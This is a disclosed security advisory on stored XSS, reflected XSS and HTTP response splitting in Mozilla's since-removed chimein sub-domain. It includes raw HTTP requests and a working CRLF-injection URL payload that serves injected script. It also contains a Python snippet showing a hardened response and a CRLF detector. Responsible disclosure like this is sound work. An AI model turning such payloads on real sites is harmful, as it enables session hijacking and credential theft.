######################################################################
# Exploit Title: Mozilla.org sub-domain Stored-XSS - Reflected-XSS - HTTP Response Splitting
# Date: 03/04/2017
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.mozilla.org
# Version: /
# Category: Stored Cross Site Scripting / Reflected Cross Site Scripting / HTTP Response Splitting
# Google dork:
# Tested on: mozilla.org chimein sub-domain
######################################################################

Mozilla description :
======================================================================
 
Mozilla is a free-software community, created in 1998 by members of Netscape. The Mozilla community uses, develops, spreads and supports Mozilla products, 
thereby promoting exclusively free software and open standards, with only minor exceptions. The community is supported institutionally by the Mozilla
Foundation and its tax-paying subsidiary, the Mozilla Corporation.

Mozilla produces many products such as the Firefox web browser, Thunderbird e-mail client, Firefox Mobile web browser, Firefox OS mobile operating system, 
Bugzilla bug tracking system and other projects.


Vulnerabilities description :
======================================================================

The chimein.mozilla.org sub-domain (accessed via HTTPS) provides a secure web messenger application. This application requires authentication.
Each user is authenticated with a "login / password". Then, to send a message to another user, a public/private key pair is used to encrypt and sign the message.
The private key is protected by a passphrase.

This secure web messenger application contains several vulnerabilities:

- A stored XSS is available in the body of each message sent encrypted to other users.
Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla users' credentials such as keys/passwords.

- A reflected XSS is available in the sign up process (login field).
Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla users' credentials such as keys/passwords.

- An HTTP Response Splitting is available in the "/message/get" endpoint.
This vulnerability can be used to create a Reflected XSS.


Proof of Concept n°1 : Stored Cross-Site Scripting
======================================================================
 
The chimein.mozilla.org domain (https://chimein.mozilla.org/) provides a very simple "sign up / sign in / send message" process with asymmetric encryption (public key,
private key, password and passphrase) to add strong security to message exchange.

A simple user can create an account, log in with this account, and send encrypted messages (with a passphrase) to any other registered user.
There are some XSS vulnerabilities. The most critical is a Stored-XSS in the body of any message. A user is able to create an account as described here:

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_001.png

Login = ycam, password = ycam, passphrase = ycam

Then, once logged in, the user can send an arbitrary message to any other user (in the example, the message is sent to the user himself for the Proof of Concept):

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_002.png

The Stored-XSS payload can be injected in the "body" of the message. The user selects a specific passphrase, so the payload is encrypted.
Once sent, the message is visible to the logged-in receiver. When this victim-user clicks on the message, he has to enter the passphrase used at encryption time.

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_003.png

When the passphrase is entered, the body of the message is decrypted and the Stored-XSS is triggered (PoC : alert(document.domain)).

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_004.png

Stored-XSS are very critical vulnerabilities and can be used by an attacker to steal private information such as session cookies or credentials. Through XSS, an attacker
can tamper with page rendering, take control of the full browser and use browser exploits to gain privileges on the local system (especially with a dedicated
framework for XSS flaws like BeEF : http://beefproject.com/).

This Stored-XSS was tested successfully with the latest Firefox version 49.0.2, latest Chrome version 53 and the latest IE version 11.

In this case, the main Stored-XSS is embedded in a personal message addressed to a victim (the victim needs to enter the passphrase to decrypt the message's body and
trigger the payload). This is a serious issue because the XSS is located in a very secure chat system using asymmetric encryption.
An attacker is able to create a fake page, a fake prompt or a fake "re-authentication" process to steal the victim's password. If the attacker gains access to a victim's
account, he can use all the features of the secure chat in place of the legitimate user.

PoC - HTTP request sample (with encrypted payload) :

POST /message/create HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://chimein.mozilla.org/
Content-Length: 1483
Content-Type: text/plain;charset=UTF-8
DNT: 1
Connection: close

login=ycam&password=ycam&sender=ycam&recipient=ycam&subject=ycam&subject_signature=C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E%0D%0A%2FPMRAbK6IZF9O9G%2BkOmy9a%2FmSPY9L8yiFdwk8CXzW%2Fnvmirx3qelwQ87z3cgrxGe8um7Ntc603h2%0D%0AWrux3wQrv5JptqEMC1Cj%2BatQQQ%2FB6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI%0D%0AKpy%2F0TgJhkpWj%2BPO3YIvxy015imeISUgmZyTmOaJAy7%2FOQzvw5GUAS5nTG%2FtU79kO7AlhQLTgjlL%0D%0AE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw%3D%3D&body=O8E%2BSCVlBZiL8xsg0yEg%2BK5%2BjdHKkuQA89z8FpLDekOT3CUa43B%2FQw%2BBxyCTgccngdRp7en7Zi%2BM%0D%0AwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK&body_signature=kFLh%2BgNR1Ow2zuxqRebnYmiB%2FN2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z%2BYF13e%0D%0AzyWBWtwmSPff%2B6JFWIHGqYI2RR%2BqszbAduHwHSniFPkz0gKntc%2FxOe8GFX62z78pAPJfZ4tLyg8p%0D%0ALobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt%2B6t7GkCWf799ztY8R0WYJ8q%0D%0AskQAYD5LuHpdadi8%2B8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj%2BF9z8KFgc%0D%0AvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ%3D%3D&session_key=a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG%2BMmtmZjcwAPJjXePxH8%2F1XWWolhPn1fRmf4j9ybmo%0D%0AlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM%0D%0ATxVPIcT%2FvLbjTA0hrnzmm%2Ftiyq31YPVOYq3Di95urw38DFJIRPKiP%2FcJ0GoWkUrcB6OK8lCfvx0K%0D%0AWsS%2BPpAB%2Fc1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ%2B2AkjhwcNzqWHQb%0D%0AHHm1wN6fkalHKXW7%2BwM2ctioB1JaE3gYE7WmGA%3D%3D&session_key_iv=zOtfAHFpmaW%2Bhm2xcJhPxw%3D%3D&


Proof of Concept n°2 : Reflected Cross-Site Scripting
======================================================================

There is another Reflected XSS vulnerability in the "login" text input during registration (the user login needs to be new at each sign up):

Payload injection :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_001.png

Reflected XSS fired :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_002.png


Proof of Concept n°3 : HTTP Response Splitting leveraged to Reflected XSS
======================================================================

Message exchanges are made through API calls: for example, when a user POSTs a message, the "/message/create" entry point is called, and
messages are listed through "/message/list". To consult a specific message, the following request is made (as an example, the message ID 57 owned by
the user ycam with password ycam is used as Proof of Concept):

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

login=ycam&password=ycam&id=57

The response body is JSON:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 1525
Date: Fri, 21 Oct 2016 00:05:14 GMT
Connection: close

{"id":57,"sender":"ycam","recipient":"ycam","subject":"ycam","subject_signature":"C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E\r\n/PMRAbK6IZF9O9G+kOmy9a/mSPY9L8yiFdwk8CXzW/nvmirx3qelwQ87z3cgrxGe8um7Ntc603h2\r\nWrux3wQrv5JptqEMC1Cj+atQQQ/B6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI\r\nKpy/0TgJhkpWj+PO3YIvxy015imeISUgmZyTmOaJAy7/OQzvw5GUAS5nTG/tU79kO7AlhQLTgjlL\r\nE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw==","body":"O8E+SCVlBZiL8xsg0yEg+K5+jdHKkuQA89z8FpLDekOT3CUa43B/Qw+BxyCTgccngdRp7en7Zi+M\r\nwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK","body_signature":"kFLh+gNR1Ow2zuxqRebnYmiB/N2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z+YF13e\r\nzyWBWtwmSPff+6JFWIHGqYI2RR+qszbAduHwHSniFPkz0gKntc/xOe8GFX62z78pAPJfZ4tLyg8p\r\nLobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt+6t7GkCWf799ztY8R0WYJ8q\r\nskQAYD5LuHpdadi8+8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj+F9z8KFgc\r\nvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ==","session_key":"a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG+MmtmZjcwAPJjXePxH8/1XWWolhPn1fRmf4j9ybmo\r\nlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM\r\nTxVPIcT/vLbjTA0hrnzmm/tiyq31YPVOYq3Di95urw38DFJIRPKiP/cJ0GoWkUrcB6OK8lCfvx0K\r\nWsS+PpAB/c1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ+2AkjhwcNzqWHQb\r\nHHm1wN6fkalHKXW7+wM2ctioB1JaE3gYE7WmGA==","session_key_iv":"zOtfAHFpmaW+hm2xcJhPxw==","status":"read","sent_date":"2016-10-20T23:05:30.009Z","retrieved_date":"2016-10-20T23:06:45.811Z","read_date":"2016-10-20T23:06:48.066Z"}

Screenshot : 
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png

If a user changes the value of the "id" POST parameter of the initial request, the following error is returned:

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

login=ycam&password=ycam&id=xxx

Error received :

HTTP/1.1 500 message xxx does not exist
Date: Fri, 21 Oct 2016 00:07:11 GMT
Connection: close
Content-Length: 0

Screenshot : 
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png

The "id" value is reflected in the HTTP status line returned by the server.

With the sequence %0a%0d (a line-feed / carriage-return pair), an attacker can forge headers and response content himself:

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

login=ycam&password=ycam&id=xxx%0a%0dyyy%0a%0dzzz%0a%0d

Response :

HTTP/1.1 500 message xxx
yyy
zzz
 does not exist
Date: Fri, 21 Oct 2016 00:08:40 GMT
Connection: close
Content-Length: 0

Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png

So, with a specific payload, an attacker can forge his own response from the server with the right headers (Content-Type: text/html)
and arbitrary source code. Moreover, the payload can be sent directly as a GET or a POST parameter. With GET, the payload is easier
to deliver to victims:

https://chimein.mozilla.org/message/get?login=ycam&password=ycam&id=x%0a%0dContent-Length: 100%0a%0dContent-Type: text/html%0a%0d%0a%0d<html><body><script>alert(document.domain)</script></body></html><!--

Or hidden with the URL shortener bit.ly:

https://mzl.la/2eypf8b

Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_006.png

Tested successfully with the latest Firefox version 49.0.2.

HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to 
properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and 
similar exploits.
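As an added example (not code from the advisory, from Mozilla, or from the chimein application), the following Python contrasts the status-line pattern described above with a hardened error response that never echoes the "id" into the status line or headers, and flags request targets whose "id" is not a plain integer. The request targets are constructed for this example; only the endpoint and parameter names come from the advisory.

```python
import json
import re
from urllib.parse import parse_qs, urlparse

# Constructed request targets modelled on the advisory's /message/get endpoint
# (parameter names come from the advisory; the values are made up for this example).
SAMPLE_REQUESTS = [
    "/message/get?login=ycam&password=ycam&id=57",
    "/message/get?login=ycam&password=ycam&id=xxx",
    "/message/get?login=ycam&password=ycam&id=x%0a%0dContent-Type: text/html%0a%0d%0a%0d<html>",
]

CRLF_RE = re.compile(r"[\r\n]")
MESSAGE_ID_RE = re.compile(r"[0-9]{1,18}")  # message ids are plain positive integers


def vulnerable_status_line(raw_id: str) -> str:
    """The pattern the advisory describes: the raw 'id' echoed into the status line.
    Any CR or LF in the value ends the status line and injects new header lines."""
    return f"HTTP/1.1 500 message {raw_id} does not exist"


def response_is_split(status_line: str) -> bool:
    """A status line must be a single line; an embedded CR or LF means it was split."""
    return CRLF_RE.search(status_line) is not None


def hardened_error_response(raw_id: str):
    """Fixed reason phrase, fixed headers, and the rejected id only in a JSON body,
    where json.dumps turns control characters into the escapes \\n and \\r."""
    if MESSAGE_ID_RE.fullmatch(raw_id):
        status = "HTTP/1.1 404 Not Found"      # well-formed id, no such message
    else:
        status = "HTTP/1.1 400 Bad Request"    # malformed id, rejected before lookup
    body = json.dumps({"error": "message does not exist or id is invalid", "id": raw_id})
    return status, {"Content-Type": "application/json"}, body


def flag_requests(targets):
    """Detection over request targets: flag any 'id' that is not a plain integer
    or carries CR/LF. parse_qs percent-decodes, so %0a%0d becomes real control
    characters before the check runs."""
    flagged = []
    for target in targets:
        query = parse_qs(urlparse(target).query, keep_blank_values=True)
        for raw_id in query.get("id", []):
            if not MESSAGE_ID_RE.fullmatch(raw_id) or CRLF_RE.search(raw_id):
                flagged.append(target)
                break
    return flagged
```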

Screenshots :
======================================================================

- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_002.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_003.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_004.png

- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_002.png

- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_006.png


Solution:
======================================================================

Fixed by the Mozilla security team.
DNS entry "chimein.mozilla.org" deleted.
 
 
Additional resources / article and screenshots :
======================================================================

- https://www.mozilla.org
- https://bugzilla.mozilla.org/show_bug.cgi?id=1311883
- https://bugzilla.mozilla.org/show_bug.cgi?id=1311887
- https://bugzilla.mozilla.org/show_bug.cgi?id=1312034
- https://www.mozilla.org/en-US/security/bug-bounty/web-hall-of-fame/
- http://www.asafety.fr
- http://www.synetis.com
- https://www.asafety.fr/vuln-exploit-poc/contribution-mozilla-http-response-splitting-reflected-stored-xss/

 
Report timeline :
======================================================================
 
2016-10-20 : Mozilla security team alerted with details and PoC (via 2 Bugzilla submissions)
2016-10-21 : Mozilla response; issues fixed via DNS entry deletion.
2016-10-21 : Mozilla acknowledgement (out of scope for the Bug Bounty, but eligible for some goodies)
2017-04-03 : Mozilla acknowledgement on Mozilla Web and Services Hall of Fame (2016Q4)
2017-04-04 : Public advisory

Credits :
======================================================================
 
    88888888
   88      888                                         88    88
  888       88                                         88
  788           Z88      88  88.888888     8888888   888888  88    8888888.
   888888.       88     88   888    Z88   88     88    88    88   88     88
       8888888    88    88   88      88  88       88   88    88   888
            888   88   88    88      88  88888888888   88    88     888888
  88         88    88  8.    88      88  88            88    88          888
  888       ,88     8I88     88      88   88      88   88    88  .88     .88
   ?8888888888.     888      88      88    88888888    8888  88   =88888888
       888.          88
                    88    www.synetis.com
                 8888  Consulting firm in management and information security
 
Yann CAM - Security Consultant @ Synetis | ASafety

--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr